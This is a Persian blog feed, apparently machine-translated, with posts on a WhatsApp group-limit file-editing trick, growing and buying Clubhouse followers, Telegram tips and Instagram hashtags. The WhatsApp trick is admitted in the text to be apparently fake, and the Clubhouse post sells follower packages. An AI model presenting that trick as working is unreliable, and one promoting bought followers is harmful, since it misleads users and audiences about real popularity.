اول از همه ، روی نماد "سه خط" ضربه بزنید و از آنجا گزینه "دستگاه" را انتخاب کنید.محدودیت ES-Explorer wp grpگام 2:اکنون ، اگر روی آن ضربه بزنید ، پوشه «داده» را پیدا خواهید کرد. دوباره روی پوشه «داده» که در صفحه بعدی قرار دارد ضربه بزنید.ES_Explorer wp grp داده های محدودمرحله 3:سپس ، شما یک پوشه به نام "com.whatsapp" دارید و این هدف شماست. با باز کردن پوشه ، پوشه دیگری با عنوان "shared_prefs" دریافت خواهید کرد.مرحله 4:پس از باز کردن آن پوشه ، سرانجام پرونده ای با نام "com.whatsapp_prefer" دریافت می کنید.مرحله 5:فقط پرونده را انتخاب کنید و از گزینه "بیشتر" روی "Properties" ضربه بزنید. اکنون ، برای تغییر مجوزها روی دکمه "تغییر" ضربه بزنید. از آنجا تمام مجوزها را علامت بزنید و ذخیره کنید.ES_Explorer تغییر حد grp مرحله 6: اکنون ، پرونده را با فرمت HTML باز کرده و خط شرکت کنندگان_سایز_لیمیت را پیدا کرده و مقدار آن را به 9999 تغییر دهید. whatsapp group 10000 را محدود کنید
این همه است. اکنون محدودیت شما برای افزودن افراد در یک گروه WhatsApp افزایش یافته است. با این حال ، می توانید هر مقداری را در آنجا قرار دهید تا حد مجاز به نامحدود افزایش یابد. 
FLAW: گاهی اوقات فقط تعداد را نشان می دهد اما نمی تواند بیش از 256 نفر را اضافه کند ، به نظر می رسد که این روش جعلی است.بسته شدن:
در واتس اپ می توانید کارهای زیادی انجام دهید. آخرین نکته قابل توجه این است که اگر می خواهید اعضای گروه را افزایش دهید پیوندهای دعوت را تا آنجا که می توانید به اشتراک بگذارید تا افراد بیشتری از این طریق به آن بپیوندند. هنوز Es-Explorer دارید که به شما کمک می کند حداکثر حد گروه را به حداکثر برسانید.
همچنین بخوانید:

256 is "oddly specific number"... - What the Daily WTF?

  • چگونه بفهمیم شخصی شما را در WhatsApp مسدود کرده است؟
    واتس اپ و تلگرام چگونه درآمد کسب می کنند؟
    رسانه های اجتماعی جعلی را شناسایی کنید - تلگرام ، واتس اپ ، سیگنال
    بدانید فردی وضعیت شما را در WhatsApp نادیده گرفته است یا خیر
    پیام WhatsApp را به چند شماره ذخیره نشده ذخیره کنید
    پیام ها را در WhatsApp متوقف یا مسدود کنید بدون اینکه آنها بدانند
    چگونه تماس های WhatsApp را غیرفعال کنیم؟ - Android و iPhone
    بفهمید شخصی WhatsApp را حذف نصب کرده یا حذف شده است - بررسی کنید
    وضعیت آنلاین WhatsApp: هنگام گفتگو پنهان شوید - نمایش آفلاین
  • ثابت - تصاویر WhatsApp که در گالری نمایش داده نمی شوند [چرا]
    دسته بندی ها WhatsApp
    پیمایش پست
    YouTube Video را که در کشور شما در دسترس نیست مشاهده کنید
    شماره های WhatsApp GROUP - برنامه های افزودنی و برنامه ها را بارگیری کنید
khodam بازدید : 56 1400/04/24 زمان : 18:57 نظرات (0)

نحوه به دست آوردن یا خرید فالوور Clubhouse

What Is Clubhouse & Why Is It So Popular? | Screen Rant

بسیاری از مردم معتقدند که Clubhouse به زودی یکی از بزرگترین سیستم عامل های رسانه های اجتماعی خواهد بود. کلاب هاوس چیست؟ این مکانی است که می توانید در کلوپ های سخنرانی به آن گوش دهید و در آن شرکت کنید. بیش از این چیزهایی که باید در مورد Clubhouse بدانید وجود ندارد ، با این تفاوت که فوق العاده است.

در واقع ، آنقدر انحصاری است که همه نمی توانند وارد آن شوند. نحوه کار Clubhouse در اینجا است. نام این بازی برای ایجاد فالوور زیادی است تا بتوانید نفوذ کنید. در صورت تمایل می توانید از مخاطبان خود درآمدزایی کنید.

چگونه می توانید Clubhouse خود را دنبال کنید؟

می توانید آنها را بخرید یا می توانید ساعت ها و ماه ها به طور ارگانیک مخاطبان خود را بسازید. این مقاله قصد دارد هر دو آنها را پوشش دهد.

فالوور Clubhouse را بخرید

برای خرید فالوور 2 راه وجود دارد. می توانید آنها را به طور کامل خریداری کنید یا می توانید برای حضور در یک اتاق هزینه پرداخت کنید. در حال حاضر این فرصت را برای چند نفر فراهم کرده است تا بتوانند فالوور Clubhouse را خریداری کنند. این کار چند ماه طول کشید تا تنظیم کنیم ، اما سرانجام اینجا است. شما نام کاربری خود را برای ما ارسال کنید و ما بقیه کارها را انجام خواهیم داد. فقط کافیست بر روی این لینک کلیک کنید تا قیمت فالوور Clubhouse را دریافت کنید. پس از خرید فالوور خود ، می توانید فالوور ارگانیکی بدست آورید که فالوور خریداری شده شما را دفن می کنند.

گزینه شماره 2: با پرداختن به اتاق های بزرگ می توانید فالوور باشگاه را خریداری کنید. برای بسیاری از اتاق های بزرگ 50 دلار طول می کشد تا بتوانید صحبت کنید. هنگامی که اجازه صحبت در یک اتاق بزرگ را دارید می توانید فوراً فالوور خود را انتخاب کنید. غیر از این ، شما باید فالوور ارگانیک بدست آورید.

 200 دنبال کننده Clubhouse را با 20 دلار بخرید

Clubhouse Promises to Bring Free Speech to Middle East Countries Like Saudi  Arabia. Can They Deliver? | The New Republic

فالوور Clubhouse را به صورت ارگانیک بدست آورید
Clubhouse از زمان راه اندازی آن در آوریل 2020 مورد توجه بسیاری قرار گرفته است. تاریخ راه اندازی آن زمان مناسبی برای آنچه در جهان در سال 2020 اتفاق می افتد بود. COVID تعداد زیادی از افراد را در خانه های خود قرار داد و راهی برای تعامل با دیگران نداشت. کلاب هاوس از زمان راه اندازی تاکنون یک تن محبوبیت افراد مشهور را کسب کرده است ، از جمله افرادی مانند تیفانی هدیش و لوپه فیاسکو.

پیش فرض Clubhouse ساده است ، اما شبیه هیچ برنامه رسانه اجتماعی دیگر در بازار نیست. کلابهاوس یک شبکه رسانه ای اجتماعی صوتی "رها کردن" است و در این مرحله از زمان تنها راه های ثبت نام از طریق لیست انتظار یا دعوت است.

در حالی که بسیاری از افراد از Clubhouse برای ملاقات با افراد جدید در حین قرنطینه استفاده کرده اند ، افراد تأثیرگذار کاربرد دیگری پیدا کرده اند. بسیاری از افرادی که در شبکه های اجتماعی شغلی دارند دریافتند که از طریق این برنامه می توانند به طور قابل توجهی فالوور  خود را رشد دهند.از آنجا که این برنامه بسیار جدید است ، با رشد قابل توجه کاربر جدید در چند ماه گذشته ، مردم هنوز در تلاش هستند تا دریابند که بهترین روش استفاده از Clubhouse چیست.ما لیستی از نکات و راهکارها را برای کمک به کاربران در یافتن بهترین راه برای ساختن Clubhouse شما در زیر جمع آوری کرده ایم.

Beijing blocks access to Clubhouse app after surge in user numbers | China  | The Guardian

حساب Clubhouse خود را زودهنگام دریافت کنید

با توجه به اینکه Clubhouse هنوز در مراحل اولیه خود قرار دارد ، زمان بهتری برای ورود به سیستم عامل وجود ندارد.وقتی سیستم عامل های شبکه های اجتماعی از حساب ها اشباع می شوند ، ساختن موارد زیر دشوار است. علاوه بر این ، Clubhouse در حال حاضر فقط دعوت است که از ورود ربات ها و حساب های هرزنامه به سیستم عامل جلوگیری می کند.کسانی که موفق به ورود زودهنگام به Clubhouse و استفاده مکرر از سیستم عامل شوند ، در طولانی مدت پاداش می گیرند.در نهایت ، وقتی برنامه اشباع تر شود ، برجسته شدن در میان میلیون ها مشکل خواهد بود.قبل از اینکه بخواهید حضور رسانه های اجتماعی خود را در هر سیستم عامل ایجاد کنید ، مهم است که از خود چند س askال بپرسید:

Let's Talk: How to Make Clubhouse a Safer and More Accessible Place to Chat  | PCMag

آیا با نقاط قوت اجتماعی شما همسو است؟

کلاب هاوس یک پلت فرم فقط صوتی است. بسیاری از افراد با بستری مانند این اوقات سختی را پشت سر می گذارند. اگر شما هم جزو آن دسته از افراد باشید ، لزوماً متوجه نخواهید شد که استفاده از کلابهاوس یک مزیت بزرگ برای شماست.

خوشبختانه انواع مختلفی از سیستم عامل های رسانه های اجتماعی وجود دارد که ممکن است نقاط قوت شما را جذب کند. TikTok برای کسانی که می بینند از طریق ویدئو بهتر با مخاطبان خود ارتباط برقرار می کنند بسیار مناسب است. برنامه ای مانند اینستاگرام برای کسانی که دوست دارند اجازه دهند تصاویرشان صحبتشان را بکنند بسیار مناسب است.

آیا با جمعیت شناسی شما همسو است؟به دلیل موفقیت اخیر ، دشوار است بتوان ارزیابی کرد که دقیقاً مشخصات جمعیتی Clubhouse در آینده چگونه است.

در حال حاضر ، به نظر می رسد این اپلیکیشن تأثیرگذارهای شبکه های اجتماعی را به دنبال جذب بستر خود جذب می کند. این می تواند یک مزیت بزرگ برای کسانی باشد که به دنبال ایجاد روابط با خالقین همفکر هستند.با این اوصاف ، اگر شما از قبل دارای یک بستر جامع رسانه های اجتماعی و جمعیت شناسی مستقر هستید ، باید از خود بپرسید که آیا با مخاطبان هدف کلاب هاوس مطابقت دارد یا خیر.در رسانه های اجتماعی ، بسیار مهم است که به یاد داشته باشید برای موفقیت لازم نیست همه پلتفرم ها را فتح کنید. مهمترین چیز این است که آنچه را که برای شما مناسب است پیدا کنید.

به چه روش هایی از Clubhouse برای سودآوری شما استفاده می کنید؟

Clubhouse احتمالاً برای کسانی که می توانند راحت و با اطمینان از یک پلت فرم فقط صوتی استفاده کنند ، بهترین کار را خواهد کرد. علاوه بر این ، باید مطمئن شوید که جمعیت شما با سیستم عامل همسو است.قبل از اینکه تصمیم بگیرید Clubhouse مناسب شماست یا خیر ، باید همه این موارد را در نظر بگیرید.

بیوگرافی Great Clubhouse را بنویسید

در عصر دیجیتال ، برداشت های اول بیش از هر زمان دیگر مهم هستند. شما می خواهید در میان جمعیت میلیاردی در اینترنت برجسته شوید.شما می خواهید مطمئن شوید که بیوگرافی شما در Clubhouse بدون مشغله زیاد چشم نواز است.دو خط اول بیوگرافی شما مهمترین هستند زیرا این همان چیزی است که افراد هنگام مرور در پروفایل ها ابتدا نشان داده می شوند. مهم است که به فالوور بالقوه قطعه ای از آنچه در مورد آن هستید را نشان دهید.در بیوگرافی خود ، باید در مورد داستان ، دستاوردها و هر چیز دیگری که فکر می کنید برای همکاران سازنده جذاب باشد صحبت کنید. همچنین می توانید سایر رسانه های اجتماعی خود را در نمایه Clubhouse خود پیوند دهید - و قطعاً باید از این مزیت استفاده کنید!نشان دادن فالوور خود در هرجای دیگر که بتوانند با شما همگام شوند در ایجاد موارد زیر مهم است.

از افراد مناسب دعوت کنید تا به Clubhouse بپیوندند

دعوت های شما در کلاب هاوس بسیار مهم است.وقتی کار خود را شروع می کنید ، فقط یک دعوت نامه دریافت خواهید کرد. با استفاده از برنامه به مرور زمان بیشتر جمع خواهید شد. همانطور که گفته شد ، به دست آوردن دعوت نامه ها بسیار دشوار است - مخصوصاً وقتی تازه وارد برنامه نشده اید.

فقط باید از افرادی دعوت کنید که می دانید مرتباً از کلابهاوس استفاده می کنند.گرچه این مورد هنوز تأیید نشده است ، اما به نظر می رسد Clubhouse ارزیابی می کند چه کسی را برای دعوت انتخاب می کنید. بسیاری از کاربران گمان می کنند Clubhouse به کسانی که دوستشان در این برنامه فعال هستند دعوت نامه بیشتری اعطا می کند.

اگر دوستانی را دعوت کنید که هرگز از این برنامه استفاده نمی کنند ، ممکن است در آینده برای دریافت دعوت های بیشتر مشکل داشته باشید. همچنین به سختی می توان یاد گرفت که چگونه دنبال کنندگان Clubhouse را بدست آورید.از طرف دیگر ، وقتی از افرادی که در برنامه تأثیرگذار هستند دعوت می کنید ، ممکن است در گرفتن دعوت نامه شانس بیشتری داشته باشید.

Clubhouse now available globally on Android - GSMArena.com news

هنگامی که دعوت خود را برای پیوستن به کلابهاوس دریافت می کنید ، صفحه شما خوانده می شود: نامزد شده توسط: (نام)همین منطق در مورد افرادی که شما به کلابهاوس دعوت می کنید اعمال می شود. این دلیل دیگری است که استفاده از دعوتهای شما بسیار مهم است ، زیرا هر بار که شخصی روی نمایه نامزد شما کلیک می کند ، وی نیز نمایه شما را می بیند.اجتماعی بودن در کلاب هاوسحضور در اتاق ها و عضویت فعال بودن بهترین راه برای رشد حساب Clubhouse شما است.پیوستن به یک اتاق و بلافاصله شروع به صحبت با اعضا می تواند کمی دلهره آور باشد. با این حال ، قرار دادن خود در آنجا بهترین راه برای بازاریابی است. با صحبت کردن در اتاق ها ، حتی اگر فقط یک سوال بپرسید یا خودتان را معرفی کنید ، فالوور خود را کسب خواهید کرد.

مهم است که به هر اتاقی که می پیوندید ارزش اضافه کنید. اگر می خواهید نحوه جذب فالوور Clubhouse را بفهمید ، این بهترین روش است. هنگامی که شرکت می کنید ، همچنین توانایی شبکه سازی و همکاری با تأثیرگذارهای بزرگ در برنامه را دارید.شبکه در همه گیر کنونی به طور فزاینده ای دشوار شده است ، به همین دلیل Clubhouse یک بستر شسته و رفته است. شما می توانید در کنفرانس ها به صورت رایگان و از امنیت خانه خود شرکت کنید!این روزها داشتن مکالمه واقعی با افراد جدید احساس لوکس بودن می کند. مهم است که به یاد داشته باشید که افزایش افراد زیر نباید تنها هدف شما در Clubhouse باشد. همچنین می توانید از این فرصت استفاده کنید:از تجربیات دیگران بیاموزید و آموزش خود را در مورد شبکه بیشتر کنید.با دوستان جدید آشنا شوید!وقتی در اتاق ها س questionsال می کنید یا مشارکت می کنید ، تمام تلاش خود را بکنید تا طبیعی شود. ابتدا خود را معرفی کنید ، که به عنوان کسی برای هر کسی که ممکن است علایق مشابه شما داشته باشد عمل می کند و سپس به س yourال خود ادامه دهید.

این یک روش عالی برای برقراری ارتباط با افرادی است که به طور طبیعی نمایه شما را مرور می کنند و تشخیص می دهند آیا می خواهند با شما همگام باشند!نترسید خودتان را در Clubhouse قرار دهید. در هر اتاقی که به آن می پیوندید عضوی با ارزش باشید و شاهد جمع شدن فالوور خواهید بود.همکاری کنید ، رقابت نکنید

روش های مختلفی برای قالب بندی اتاق کلابهاوس وجود دارد. اتاقهایی وجود دارد که گروه بزرگی از مردم می توانند آزادانه در آنها صحبت کنند. این برای معاشرت بسیار مناسب است ، اما با فاصله گرفتن گروه از موضوع ، می تواند به سرعت بسیار بی نظم شود.

بسیاری از کاربران Clubhouse دریافتند که موثرترین تنظیم برای یک اتاق به صورت زیر است:

یک نفر میزبان است ، افرادی را که هنگام بحث دست خود را بلند می کنند "فراخوانی" می کند. بعد از اینکه فرد فرصتی برای پرسیدن سال پیدا کرد ، میزبان او را به سطح "شنونده" برمی گرداند.گروهی از ناظران هستند که به عنوان سخنران عمل می کنند. آنها در زمینه هر آنچه این هیئت پوشش می دهد متخصص خواهند بود.

How to use Clubhouse on Android with step-by-step registration steps.

شنوندگان برای آشنایی با موضوع مورد نظر در آنجا خواهند بود ، اما در هر زمان که بخواهند می توانند دستان خود را بالا ببرند و در آن مشارکت کنند.اگر می خواهید میزبان یک پنل باشید ، بهترین راه برای انجام این کار شبکه سازی است. شما باید با افراد در زمینه مورد علاقه خود همکاری کنید و آن را با هم سازمان دهید. این بهترین راه برای اطلاع رسانی و سازماندهی پنل شماست.اگر اطلاعات ارزشمندی ارائه دهید ، افراد به پروفایل شما جذب می شوند تا ببینند چه چیز دیگری برای گفتن دارید.Clubhouse خلاصه شده استبرقراری ارتباط با افراد جدید و همفکر چیزی است که همه ما آن را از دست داده ایم. این بزرگترین دلیلی است که کلبه هاوس طی ماههای آینده سر به فلک خواهد کشید.اگر شما علاقه مند به دنبال کردن رسانه های اجتماعی هستید ، باید اکنون Clubhouse را در نظر بگیرید که می دانید چگونه می توانید فالوور Clubhouse را جذب کنید.

مهم است که قبل از اینکه برنامه با کاربران اشباع شود ، وارد برنامه شوید تا بتوانید از منحنی پیش بروید. اطمینان حاصل کنید که نمایه شما آموزنده است و با شخصیت و اهداف شما همسو است.علاوه بر این ، تمام تلاش خود را انجام دهید تا یک شرکت کننده فعال در برنامه باشید - این کار با دعوت از سایر شرکت کنندگان فعال شروع می شود.اگر عاشق شبکه سازی ، سخنرانی در جمع و معاشرت هستید ، Clubhouse یک فرصت عالی برای کمک به شما برای رشد در سیستم عامل های شما خواهد بود!

khodam بازدید : 40 1400/04/23 زمان : 20:12 نظرات (0)

نکات و ترفندهای تلگرامی برای تقویت بازی پیام رسانی خود

Telegram tips and tricks

اگر می خواهید با دوستان و خانواده خود گپ بزنید ، Telegram گزینه ای کاملاً متقابل است که به کاربران Android ، iOS ، Windows ، MacOS و Linux اجازه می دهد پاتوق و ارتباط برقرار کنند. در مقایسه با برخی دیگر از گزینه های چت ، تلگرام تمرکز زیادی بر حفظ حریم خصوصی و امنیت دارد ، و آن را به گزینه ای مناسب برای زندگی دیجیتال تبدیل می کند. اگر در تلگرام غواصی می کنید ، در اینجا چند نکته و ترفند آورده شده است که به شما امکان می دهد از تجربه خود بیشترین بهره را ببرید.آیا به دنبال روش های ایمن دیگری برای گپ زدن با دوستان خود هستید؟ مقاله ما را در مورد بررسی بهترین برنامه های پیام رمزگذاری شده برای iOS و Android بررسی کنید.

Download Telegram

ANDROID IOS

چتهای خود را سازماندهی کنیدنکات و ترفندهای تلگرامکات و ترفندهای تلگرامنکات و ترفندهای تلگراماگر مرتباً از تلگرام استفاده می کنید ، ممکن است دریابید که به ظاهر یک لیست بی پایان از چت ها دارید ، اما اگر احساس می کنید در حال دفن شدن هستید ، گزینه بهتری وجود دارد. تلگرام به شما امکان می دهد پوشه هایی ایجاد کنید تا بتوانید مکالمات خود را مرتب کنید. به عنوان مثال ، شما می توانید پوشه ای برای قرار دادن همه گپ های شخصی خود و یک پوشه جداگانه برای مدرسه یا محل کار ایجاد کنید. برای ایجاد پوشه در تلگرام ، این مراحل ساده را دنبال کنید:

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: با استفاده از نوار پیمایش ، به صفحه تنظیمات بروید.

مرحله 3: روی پوشه های گپ ضربه بزنید.

مرحله 4: ایجاد ایجاد پوشه جدید را برای ایجاد اولین پوشه خود انتخاب کنید.

مرحله 5: نام پوشه ای را وارد کنید ، سپس روی دکمه + افزودن چت ها ضربه بزنید تا مکالمات موجود خود را به پوشه اضافه کنید.

مرحله 6: روی دکمه ایجاد ضربه بزنید تا مراحل انجام شود.

اکنون ، هنگامی که برای مشاهده مکالمات خود به برگه Chats خود برگشتید ، توانایی مشاهده همه چت ها را در بالای صفحه و همچنین پوشه های خاص ایجاد شده خود را مشاهده خواهید کرد.

پیامهای ارسالی را ویرایش کنید

Telegram tips and tricks

اگر به طور تصادفی پیامی را با خطایی در آن ارسال کرده اید ، وحشت نکنید. در تلگرام راهی برای ویرایش پیام هایی که قبلاً ارسال شده اند وجود دارد. اگر می خواهید پیامی را به طور کامل حذف کنید ، می توانید این کار را فقط با چند کلیک انجام دهید. در اینجا نحوه:

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: گپ را وارد کنید که می خواهید در آن پیامی را تغییر دهید.

مرحله 3: انگشت خود را روی حباب گپ نگه دارید که می خواهید آن را تغییر دهید تا زمانی که منوی زمینه ظاهر شود.

مرحله 4: برای تغییر پیام یا ویرایش را انتخاب کنید تا کلاً از مکالمه حذف شود.

پاسخ به پیام های خاص

اگر در یک چت شلوغ هستید ، ممکن است برای دیگران دشوار باشد که تشخیص دهید به کدام پیام پاسخ می دهید ، اما تلگرام یک ترفند برای آسان کردن همه چیز دارد. در چت های تلگرام می توانید مشخص کنید که به چه پیامی پاسخ می دهید و تلگرام این موضوع را برای سایر افراد گروه روشن می کند. برای پاسخ به یک پیام خاص این مراحل را دنبال کنید:

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: چتی را وارد کنید که می خواهید به آن پاسخ دهید.

مرحله 3: انگشت خود را روی حباب گپ نگه دارید که می خواهید به آن پاسخ دهید.

مرحله 4: دکمه پاسخ را انتخاب کنید ، سپس پیام خود را مطابق معمول تایپ کنید.

مرحله 5: پیام خود را ارسال کنید.

Telegram tips and tricks

طرح زمینه برنامه خود را تنظیم کنید

همه چیز وقتی قابل شخصی سازی است کمی جالب تر است و تلگرام تغییر موضوع بصری برنامه را برای شما آسان می کند. این یک احساس برای شخصی سازی تلگرام است ، از انتخاب حالت روشن یا تاریک گرفته تا موضوعات رنگی لهجه.

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: با استفاده از نوار پیمایش ، به صفحه تنظیمات بروید.

مرحله 3: روی تنظیمات منوی Appearance ضربه بزنید.

مرحله 4: از اینجا می توانید رنگ گپ ، پس زمینه گپ ، اندازه متن و نحوه گرد شدن حباب های پیام خود را انتخاب کنید.

مرحله 5: در صورت تمایل ، دکمه + را در گوشه بالا سمت راست فشار دهید تا یک تم جدید ایجاد کنید. به این ترتیب می توانید هر چند بار که خواستید بین چند ایستگاه از پیش تنظیم کنید.

متن پیام را کپی کنید

اگر پیامی با اطلاعات دریافت کردید که می خواهید آن را در برنامه دیگری کپی و جایگذاری کنید ، می توانید با استفاده از این ترفند تلگرام دقیقاً آنچه را می خواهید انتخاب کنید. برای کپی متن پیام با کشیدن انگشت این مراحل را دنبال کنید.

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: چتی را وارد کنید که می خواهید متن را کپی کنید.

مرحله 3: انگشت خود را روی حباب گپ نگه دارید که می خواهید متن را کپی کنید.

مرحله 4: با باز کردن منوی زمینه ، انگشت خود را روی پیام چت نمایش داده شده نگه دارید و انگشت خود را به عقب و عقب بکشید تا متن انتخاب شود.

مرحله 5: پس از انتخاب ، روی دکمه کپی ظاهر می شود ضربه بزنید.

برنامه ریزی پیام ها

نمی خواهید بلافاصله پیام ارسال کنید؟ با Telegram می توانید زمان ارسال پیام در گروه را برنامه ریزی کنید. این می تواند مفید باشد اگر بخاطر داشته باشید که باید از شخصی در چک کنید یا اطمینان حاصل کنید که پیام فقط زمانی ارسال می شود که گیرنده آن را ببیند. برای برنامه ریزی پیام ، این مراحل را دنبال کنید:

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: گپ مورد نظر خود را برای ارسال پیام وارد کنید.

مرحله 3: پیام خود را مطابق معمول وارد کنید.

مرحله 4: دکمه Send را پایین نگه دارید و زمانبندی پیام را انتخاب کنید.

مرحله 5: تاریخ و زمانی را که می خواهید پیام ارسال شود انتخاب کنید. همچنین می توانید هنگام آنلاین شدن شخصی پیام را انتخاب کنید.

اگر می خواهید یک پیام برنامه ریزی شده را تغییر دهید یا حذف کنید ، روی نماد ساعت که در نوار چت ظاهر می شود کلیک کنید. این فقط درصورتی ظاهر می شود که پیامی را برنامه ریزی کرده باشید. در مرحله بعد ، پیام را مانند هر پیام استاندارد ویرایش یا حذف کنید.

Telegram tips and tricks

نظرسنجی های گروهی ایجاد کنید

نمی توانید تصمیم بگیرید که بعداً با دوستان خود یک پیتزا ، سوشی یا غذای هندی بگیرید؟ برای تصمیم گیری سریع ، به راحتی در هر گپ گروهی خود نظرسنجی ایجاد کنید. هر کس در داخل گروه می تواند نتایج نظرسنجی را هنگام رای گیری مشاهده کند. در اینجا نحوه ایجاد نظرسنجی آورده شده است:

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: وارد گپ گروهی شوید که می خواهید نظر سنجی ایجاد کنید.

مرحله 3: روی نماد پیوست (که به صورت گیره کاغذ نشان داده شده) در کنار نوار پیام ضربه بزنید.

مرحله 4: گزینه نظرسنجی را انتخاب کنید.

مرحله 5: س pollال نظرسنجی خود و گزینه های رأی گیری را وارد کنید. برای افزودن گزینه های رأی گیری اضافی ، روی افزودن گزینه ضربه بزنید.

مرحله 6: در صورت تمایل ، رای دادن را ناشناس کنید ، اجازه دهید چندین پاسخ داده شود ، یا حالت آزمون را روشن کنید که در آن کاربران نمی توانند پاسخ های خود را لغو کنند.

مرحله 7: بعد از اتمام ، روی دکمه ارسال ضربه بزنید.

گپ های خود را ایمن نگه دارید

تلگرام یک گزینه عالی برای ایمن نگه داشتن پیام های شما بین دوستان ، خانواده و همکاران است. اگر نگران گوش دادن به "برادر بزرگ" هستید یا صرفاً نمی خواهید دیگران پیام های شما را مشاهده کنند ، در اینجا دو راه برای ایمن نگه داشتن چت های خود هنگام چت با دیگران در تلگرام وجود دارد:

حالت Secret Chat را روشن کنید

حالت Secret Chat به شما امکان می دهد گپی ایجاد کنید که از پیام های رمزگذاری شده کاربر به کاربر استفاده می کند ، به این معنی که آنها در سرورهای Telegram ذخیره نمی شوند. اگرچه رمزگذاری استاندارد کاربر به سرور در تلگرام برای اکثر افراد کافی خواهد بود ، اما این روش به شما یک سطح امنیتی بیشتر می دهد.

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: روی مخاطبی که می خواهید یک گپ امن ایجاد کنید ضربه بزنید.

مرحله 3: با باز کردن گپ ، روی نام مخاطب در بالای صفحه ضربه بزنید.

مرحله 4: روی گزینه More bubble ضربه بزنید.

مرحله 5: شروع راز گپ را انتخاب کنید.

راه دیگر برای ایمن نگه داشتن پیام های تلگرام قفل کردن برنامه است. به این ترتیب ، ابتدا می خواهید پین وارد کنید یا وقتی می خواهید مکالمه خود را مشاهده کنید از احراز هویت بیومتریک استفاده کنید.

مرحله 1: برنامه تلگرام را در تلفن هوشمند یا رایانه لوحی خود باز کنید.

مرحله 2: با استفاده از نوار پیمایش ، به صفحه تنظیمات بروید.

مرحله 3: روی تنظیمات حریم خصوصی و امنیت ضربه بزنید.

مرحله 4: Passcode Lock یا Passcode & Face ID را انتخاب کنید.

مرحله 5: روی Turn Passcode On ضربه بزنید و پینی را که می خواهید استفاده کنید وارد کنید.

مرحله ششم: در صورت تمایل ، انتخاب کنید که تلگرام مکالمات شما را قفل خودکار کند.

khodam بازدید : 45 1400/04/10 زمان : 18:45 نظرات (0)

15 راه برای به دست آوردن بیشتر فالوور اینستاگرام در سال 2021

11 hacks to become Instagram famous add photo manually

اینستاگرام به سرعت از اولین برداشت خود به عنوان یک برنامه سرگرم کننده برای کودکان پیشی گرفت و به ابزاری جدی برای بازاریابی ، فروش ، شبکه سازی و ایجاد مخاطب برای افراد و مارک ها تبدیل شده است. این سایت یکی از محبوب ترین سایت های شبکه های اجتماعی روی کره زمین است که بیش از 200 میلیون عضو فعال ماهانه 60 میلیون تصویر و 1.6 میلیارد پسند در روز به اشتراک می گذارند.

چقدر عالی است؟ نرخ نامزدی برای مارک ها در اکثر شبکه های اجتماعی کمتر از 0.1٪ است ، اما اینستاگرام همه آنها را از بین می برد. میانگین میزان مشارکت اینستاگرام برای مارک ها در مطالعه 2014 فارستر ، حماسه 58 برابر بیشتر از فیس بوک بود.

خواستگاری اینستاگرام در مقابل فیس بوک


نمی توانید با اعدادی از این قبیل بحث کنید. اما این فقط متوسط ​​است. و همانطور که من از همه شیوه های بازاریابی آنلاین دفاع می کنم ، شما نمی خواهید متوسط ​​باشید! این یک رویا یا هدف نیست.

مطمئناً 58 برابر جذابیت بیشتر از فیس بوک عالی به نظر می رسد ، اما شما می توانید در اینستاگرام خیلی بهتر از این کار کنید. این که آیا شما یک مارک تجاری بزرگ هستید یا شاید فقط در فکر این هستید که چگونه اینستاگرام را مشهور کنید ، من نمی خواهم که شما به طور متوسط ​​تلاش کنید. من می خواهم شما به ستاره ها دست پیدا کنید و یک شاخدار اینستاگرام شوید. اسب شاخدار دیجیتالی آن موجود جادویی و نادر است که به ترتیب بزرگتر از همه بهتر عمل می کند.

و شما با استفاده از این یازده هک شگفت انگیز اینستاگرام در استراتژی اجتماعی خود ، این هدف را به دست خواهید آورد. این ایده های جلب توجه کننده برای زیرنویس ها ، هشتگ ها ، نمایه و موارد دیگر اینستاگرام خود را بررسی کنید و ببینید چه چیزهایی را باید در اینستاگرام ارسال کنید تا دنبال کنندگان بیشتری داشته باشید و همچنین از دید و تعامل بیشتری برخوردار شوید.

  1. یک هشتگ مارک دار ایجاد کنید


  2. هشتگ اختصاصی ، سفارشی یا مارک دار به شما امکان می دهد در اصل مجموعه ای از بهترین مطالب خود را ایجاد کنید. وقتی یک پیرو بالقوه شما را از طریق برچسب بسیار هدفمند دیگری پیدا کند ، با دیدن پست های برتر شما احتمالاً آنها را دنبال می کند.

شما همچنین می توانید برای هر یک از فعالیت های بازاریابی اینستاگرام خود یک برچسب مارک دار ایجاد کنید. در بعضی موارد ، این گزینه بهتری است زیرا اغلب تبلیغاتی کمتر از استفاده از چیزهای خاص مربوط به تجارت شما مانند نام شرکت شما به نظر می رسد. به نوبه خود ، هشتگ های تبلیغاتی اغلب توسط پیروان استفاده می شوند ، که سپس توجه ارتباطات آنها را به خود جلب می کند. اگر آنها علایق یکسانی داشته باشند ، ممکن است شروع به دنبال کردن شما کنند.

instagram marketing ideas

2. هشتگ اختصاصی خود را به صورت متقابل تبلیغ کنید.
خیلی خوب است که شما هشتگ # شادی برای شرکت خود ایجاد کرده اید ، اما چه کسی می داند از آن برای اشتراک مطالب در مورد شما استفاده کند؟ مطمئن شوید که در نمایه شماست ، اما بازی را آفلاین کرده و آن را روی رسیدهایتان ، در تبلیغات چاپی ، روی نشانه های فروشگاه و در رویدادهای مربوطه چاپ کنید.

اگر در رادیو و تلویزیون هستید ، مردم را به استفاده از هشتگ خود راهنمایی کنید. با اطمینان از اینکه در سایر پروفایل های اجتماعی ، وب سایت و ایمیل شما قرار دارد ، کمپین های آنلاین و آفلاین را ادغام کنید. فقط امیدوار نباشید مردم آن را پیدا کنند.

3. از هشتگهای خاص صنعت استفاده کنید
شما دنبال کننده هایی می خواهید که به آنچه شما پیشنهاد می دهید علاقه مند شوند. در ابتدا استفاده از اصطلاحاتی که مختص صنعت شما نیستند منجر به جذب طرفداران بسیار کمی می شود. در این صورت ، شما باید از هشتگ هایی در پست های خود استفاده کنید که مخاطبان هدف شما به طور خاص آنها را مرور می کند.

